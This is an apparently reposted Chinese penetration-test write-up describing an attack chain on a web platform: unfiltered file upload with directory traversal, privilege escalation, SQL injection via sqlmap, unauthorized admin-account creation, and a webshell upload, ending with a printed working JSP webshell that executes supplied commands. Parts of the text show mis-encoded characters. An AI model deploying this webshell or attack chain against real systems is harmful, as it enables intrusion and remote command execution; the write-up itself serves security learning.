目標(biāo)

• 某平臺系統(tǒng)(www.target.net)

流程

本次滲透測試的流程圖：

【技術(shù)資料】

測試

拿到站點后先做信息收集，掃描目錄看看有無敏感信息

寥寥無幾，沒有任何信息，啟動burpsuite打開網(wǎng)站走一遍流程。

在創(chuàng)建目標(biāo)處存在圖片上傳接口，上傳shell試試。

沒有任何過濾，可直接上傳，但當(dāng)前目錄不解析，猜測projectKey控制上傳路徑

可跨目錄上傳，但當(dāng)前/webapp/test/uploadFile/路徑非網(wǎng)站根目錄，爆破了常見網(wǎng)站目錄但沒有一個是正確的解析shell的，先放著后續(xù)是否能找到網(wǎng)站根路徑然后再跨目錄上傳。

越權(quán)

在瀏覽到某個頁面中看到了一處鏈接/detail.shtml?key={{id}}，拿出來瀏覽器中訪問，測測是否存在越權(quán)或者SQL注入。

隨便給個數(shù)值訪問測試，發(fā)現(xiàn)只存在水平越權(quán)，不存在注入。

去掉參數(shù)直接訪問，卻彈出來了報錯頁面。

該站點使用的是spring框架，重新使用spring相關(guān)接口路由字典掃一遍，還意外掃到了druid登錄頁面，但并不存在未授權(quán)訪問和弱口令的漏洞，繼續(xù)看swagger。

在swagger中找到了一處注入和敏感信息泄露。

敏感信息泄露

根據(jù)URL猜參數(shù)名teamId，查看到所有的團隊信息。

這里也是一處越權(quán)。

sql注入

同樣猜參數(shù)名，未做任何過濾，單引號報錯，直接上sqlmap一把梭。

越權(quán)添加用戶

但翻了翻數(shù)據(jù)庫并未找到管理員賬號密碼，不過找到了網(wǎng)站接口配置信息，將接口導(dǎo)出然后放到burpsuite里面跑

成功找到了越權(quán)添加/編輯用戶接口，直接添加新管理員賬號并登錄。

任意文件上傳

回到剛才文件上傳處，通過sql注入報錯頁面我們找到了真實路徑/usr/local/test/webapps/ROOT/WEB-INF/classes/mappings/base-mapper.xml]，修改projectKey值，用…/…/…/…/跨目錄上傳shell

疑問

在最后上傳shell處，嘗試了冰蝎、哥斯拉的馬都無法正常解析，后來更換了帶密碼回顯的jsp馬才成功，請問這是什么原因？

<%if("admin".equals(request.getParameter("pwd"))){java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b));}out.print("</pre>");} %>

最后

點擊獲取【網(wǎng)絡(luò)安全學(xué)習(xí)資料·攻略】

總結(jié)

以上是生活随笔為你收集整理的某平台的一次简单渗透测试记录的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。